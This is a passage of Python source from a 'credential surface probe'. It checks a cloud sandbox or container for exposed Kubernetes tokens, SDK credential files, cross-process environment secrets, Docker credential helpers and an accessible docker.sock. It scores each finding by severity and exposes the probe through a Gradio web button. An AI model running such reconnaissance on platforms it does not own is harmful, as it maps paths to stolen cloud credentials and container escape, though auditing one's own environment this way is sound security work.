"detail": f"Pointers: {[p['env_key'] for p in ch3['pointers']]}",
})
# CH4
ch4 = channels["ch4_k8s_sa_token"]
if ch4["status"] == "detected":
findings.append({
"channel": 4, "name": "K8s SA Token",
"severity": "medium",
"title": "Kubernetes service account token present",
"detail": f"JWT-like: {ch4.get('jwt_like')}, "
f"namespace: {ch4.get('namespace', 'unknown')}",
})
# CH5
ch5 = channels["ch5_sdk_config"]
if ch5["status"] == "detected":
findings.append({
"channel": 5, "name": "SDK Config Files",
"severity": "high",
"title": "Cloud SDK credential files found on disk",
"detail": f"Files: {[f['path'] for f in ch5['files']]}",
})
# CH6
ch6 = channels["ch6_env_injection"]
if ch6["status"] == "detected":
cp = ch6["cross_process"]
findings.append({
"channel": 6, "name": "ENV Injection",
"severity": "medium",
"title": f"Sensitive env vars detected "
f"(current={ch6['current_process_interesting_count']}, "
f"cross-proc={cp.get('finding_count', 0)})",
"detail": f"Cross-process readable: {cp.get('pids_readable', 0)}"
f"/{cp.get('pids_sampled', 0)} pids",
})
# CH7
ch7 = channels["ch7_credential_helper"]
if ch7["status"] == "detected":
findings.append({
"channel": 7, "name": "Credential Helper",
"severity": "medium",
"title": f"Docker credential helpers found: "
f"{[h['name'] for h in ch7['helpers']]}",
"detail": f"Config: {ch7.get('config_path')}",
})
# CH8
ch8 = channels["ch8_sidecar_proxy"]
if ch8["status"] == "possible":
findings.append({
"channel": 8, "name": "Sidecar/Proxy",
"severity": "info",
"title": "Proxy or traffic redirect indicators detected",
"detail": f"Indicators: {len(ch8['indicators'])}",
})
# CH9
ch9 = channels["ch9_uds_proxy"]
if ch9["status"] == "detected":
docker_ok = (ch9.get("docker_probe") or {}).get("accessible", False)
pitcher_ok = (ch9.get("pitcher_probe") or {}).get("accessible", False)
parts = []
if docker_ok:
n = ch9["docker_probe"].get("container_count", 0)
parts.append(f"docker.sock accessible ({n} containers)")
if pitcher_ok:
parts.append("pitcher socket accessible")
findings.append({
"channel": 9, "name": "UDS Proxy",
"severity": "high" if docker_ok else "medium",
"title": "; ".join(parts) if parts else f"{ch9['total_count']} sockets found",
"detail": f"Docker: {docker_ok}, Pitcher: {pitcher_ok}, "
f"Total sockets: {ch9['total_count']}",
})
# Overall severity
sevs = [f["severity"] for f in findings]
if "high" in sevs:
overall = "high"
elif "medium" in sevs:
overall = "medium"
elif findings:
overall = "low"
else:
overall = "none"
# Channel summary
channel_summary = {}
for i in range(1, 10):
key = f"ch{i}_{['', 'imds_mmds', 'ecs_endpoint', 'irsa_wi','k8s_sa_token', 'sdk_config', 'env_injection','credential_helper', 'sidecar_proxy', 'uds_proxy'][i]}"
ch_data = channels.get(key, {})
channel_summary[f"channel_{i}"] = ch_data.get("status", "not_checked")
return {
"overall_severity": overall,
"finding_count": len(findings),
"channel_summary": channel_summary,
"findings": findings,
}
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def parse_args():
parser = argparse.ArgumentParser(
description="Cloud Sandbox Credential Surface Probe v2")
parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
parser.add_argument("--json-out", help="Write JSON report to file")
return parser.parse_args()
def main():
args = parse_args()
t = args.timeout
report = {
"version": "2.0",
"timestamp": int(time.time()),
"runtime": get_runtime(),
"dns": resolve_hosts(),
"runtime_context": collect_runtime_context(),
"channels": {
"ch1_imds_mmds": collect_channel_1(t),
"ch2_ecs_endpoint": collect_channel_2(t),
"ch3_irsa_wi": collect_channel_3(),
"ch4_k8s_sa_token": collect_channel_4(),
"ch5_sdk_config": collect_channel_5(),
"ch6_env_injection": collect_channel_6(),
"ch7_credential_helper": collect_channel_7(),
"ch8_sidecar_proxy": collect_channel_8(),
"ch9_uds_proxy": collect_channel_9(t),
},
"container_runtime_artifacts": collect_container_runtime_artifacts(),
}
report["assessment"] = build_assessment(report)
return report
def probe_environment():
output = main()
return output
with gr.Blocks() as demo:
gr.Markdown("## 环境探测器")
out = gr.Textbox(label="探测结果", lines=20)
btn = gr.Button("开始探测")
btn.click(fn=probe_environment, inputs=[], outputs=out)
demo.launch()